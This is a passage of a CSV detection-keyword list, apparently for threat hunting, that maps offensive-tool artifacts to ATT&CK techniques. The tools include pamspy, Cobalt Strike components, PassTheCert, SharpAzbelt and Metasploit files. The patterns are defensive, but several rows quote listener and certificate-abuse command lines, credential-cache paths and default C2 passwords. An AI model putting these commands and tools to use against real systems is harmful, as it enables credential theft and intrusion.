T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*padre-master.zip*",".{0,1000}padre\-master\.zip.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*pamspy: Failed to increase RLIMIT_MEMLOCK limit!*",".{0,1000}pamspy\:\sFailed\sto\sincrease\sRLIMIT_MEMLOCK\slimit!.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*pamspy: Failed to load BPF program: *",".{0,1000}pamspy\:\sFailed\sto\sload\sBPF\sprogram\:\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*pamspy: Unable to find pam_get_authtok function in*",".{0,1000}pamspy\:\sUnable\sto\sfind\spam_get_authtok\sfunction\sin.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*papacat -l -p *",".{0,1000}papacat\s\-l\s\-p\s.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" 
"*ParamPamPam*",".{0,1000}ParamPamPam.{0,1000}","offensive_tool_keyword","ParamPamPam","This tool is used for brute discover GET and POST parameters.","T1110 - T1210 - T1211","TA0001 - TA0002 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/ParamPamPam","1","1","N/A","N/A","3","262","61","2022-06-27T11:45:19Z","2018-11-10T08:38:30Z" "*pard0p/Cordyceps*",".{0,1000}pard0p\/Cordyceps.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*parrot*security.vdi*",".{0,1000}parrot.{0,1000}security\.vdi.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*parrotsec.org/download/*",".{0,1000}parrotsec\.org\/download\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Parrot-security-*.iso*",".{0,1000}Parrot\-security\-.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. 
security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*parse the .beacon_keys to RSA private key and public key in pem format*",".{0,1000}parse\sthe\s\.beacon_keys\sto\sRSA\sprivate\skey\sand\spublic\skey\sin\spem\sformat.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*parse_aggressor_properties*",".{0,1000}parse_aggressor_properties.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*parse_nessus_file*",".{0,1000}parse_nessus_file.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*parse_nmap_xml*",".{0,1000}parse_nmap_xml.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*parse_shellcode*",".{0,1000}parse_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*ParseGPPPasswordFromXml*",".{0,1000}ParseGPPPasswordFromXml.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*ParseMSALCache*.azure\msal_token_cache.bin*",".{0,1000}ParseMSALCache.{0,1000}\.azure\\msal_token_cache\.bin.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*",".{0,1000}ParseMSALCache.{0,1000}Appdata\\Local\\\.IdentityService\\msal\.cache.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*parser.exe -a *.dmp*",".{0,1000}parser\.exe\s\-a\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*PassDetective extract*",".{0,1000}PassDetective\sextract.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*PassDetective-main.*",".{0,1000}PassDetective\-main\..{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*passhunt.exe*",".{0,1000}passhunt\.exe.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","62","33","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" "*passhunt.exe*",".{0,1000}passhunt\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*passhunt.py*",".{0,1000}passhunt\.py.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","62","33","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" "*passivex.asm*",".{0,1000}passivex\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*passivex.dll*",".{0,1000}passivex\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*passphrase-rule1.rule*",".{0,1000}passphrase\-rule1\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*passphrase-rule2.rule*",".{0,1000}passphrase\-rule2\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*passphrase-wordlist*",".{0,1000}passphrase\-wordlist.{0,1000}","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. 
The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","10","1145","157","2023-11-14T11:46:14Z","2017-12-05T20:53:13Z" "*PassSpray.ps1*",".{0,1000}PassSpray\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*pass-station search tomcat*",".{0,1000}pass\-station\ssearch\stomcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PassTheCert.csproj*",".{0,1000}PassTheCert\.csproj.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*PassTheCert.exe*",".{0,1000}PassTheCert\.exe.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" 
"*PassTheCert.exe*",".{0,1000}PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *",".{0,1000}passthecert\.py\s\-action\sadd_computer\s\-crt\suser\.crt\s\-key\suser\.key\s\-domain\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*passthecert.py*",".{0,1000}passthecert\.py.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)*",".{0,1000}Pass\-the\-Challenge\s\(PtC\)\s\-\sby\sOliver\sLyak\s\(ly4k\).{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - 
T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.cpp*",".{0,1000}PassTheChallenge\.cpp.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.exe*",".{0,1000}PassTheChallenge\.exe.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.pdb*",".{0,1000}PassTheChallenge\.pdb.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.sln*",".{0,1000}PassTheChallenge\.sln.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.vcxproj*",".{0,1000}PassTheChallenge\.vcxproj.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" 
"*PassTheHash(*",".{0,1000}PassTheHash\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*passthehashbrowns/BOFMask*",".{0,1000}passthehashbrowns\/BOFMask.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*passthehashbrowns/SharpRDPThief*",".{0,1000}passthehashbrowns\/SharpRDPThief.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*passware-kit-forensic.sls*",".{0,1000}passware\-kit\-forensic\.sls.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*PasswareKitForensic_*_Setup.dmg*",".{0,1000}PasswareKitForensic_.{0,1000}_Setup\.dmg.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PasswareKitForensic_*_Setup.msi*",".{0,1000}PasswareKitForensic_.{0,1000}_Setup\.msi.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*passware-kit-forensic-64bit.msi*",".{0,1000}passware\-kit\-forensic\-64bit\.msi.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PASSWORD = ""Letmein123!*",".{0,1000}PASSWORD\s\=\s\""Letmein123!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*password = 
'b4bysh4rk'*",".{0,1000}password\s\=\s\'b4bysh4rk\'.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*password = 'tdragon6'*",".{0,1000}password\s\=\s\'tdragon6\'.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*Password to use for ADWS Connection*",".{0,1000}Password\sto\suse\sfor\sADWS\sConnection.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Password*S0urce0fThePr0blem*",".{0,1000}Password.{0,1000}S0urce0fThePr0blem.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Password*S3cr3tS3rvic3*",".{0,1000}Password.{0,1000}S3cr3tS3rvic3.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
